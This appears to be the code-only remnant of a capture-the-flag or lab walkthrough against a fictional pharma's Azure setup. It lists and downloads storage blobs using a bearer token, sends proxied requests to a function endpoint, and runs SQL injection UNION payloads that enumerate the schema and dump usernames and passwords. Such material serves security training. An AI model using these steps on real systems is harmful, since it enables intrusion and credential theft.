An absent defense
Solve








































TLDR
Reference
Last updated








































Last updated
$storageAccountName = "mpprod"
$headers = @{
'Authorization' = "Bearer $($AzureStorageToken.access_token)"
'x-ms-version' = '2020-04-08'
}
$url = "https://$storageAccountName.blob.core.windows.net/?comp=list"
Invoke-RestMethod -Uri $url -Headers $headers -Method Get$containerName = "portal-storage"
$url = "https://$storageAccountName.blob.core.windows.net/$containerName`?restype=container&comp=list"
Invoke-RestMethod -Uri $url -Headers $headers -Method Get$blobName = "export-users.sh"
$url = "https://$storageAccountName.blob.core.windows.net/$containerName/$blobName"
Invoke-WebRequest -Uri $url -Headers $headers -OutFile $blobNametestacc@massive-pharma.com:[REDACTED_PASSWORD]curl -X POST https://pharsight-dev.azurewebsites.net/api/HttpPharSightTrigger01 \
-d '{"trialname": "CardioPhase II"}'curl -k -x http://127.0.0.1:8080 -X POST \
https://pharsight-dev.azurewebsites.net/api/HttpPharSightTrigger01 \
-d '{"trialname": "CardioPhase II"}'id full_name participant_id date trialname health_conditionsSELECT id, full_name, participant_id, date, trialname, health_conditions
FROM table_name WHERE trialname = <userinput>'UNION SELECT 1, @@version, null, null, 5,6 -- 'UNION SELECT 1, table_name, null, null, 5,6 from information_schema.columns -- 'UNION SELECT 1, column_name, null, null, 5,6 from information_schema.columns where table_name = \'appusers\' -- 'UNION SELECT null, id, null, null, username,password from appusers --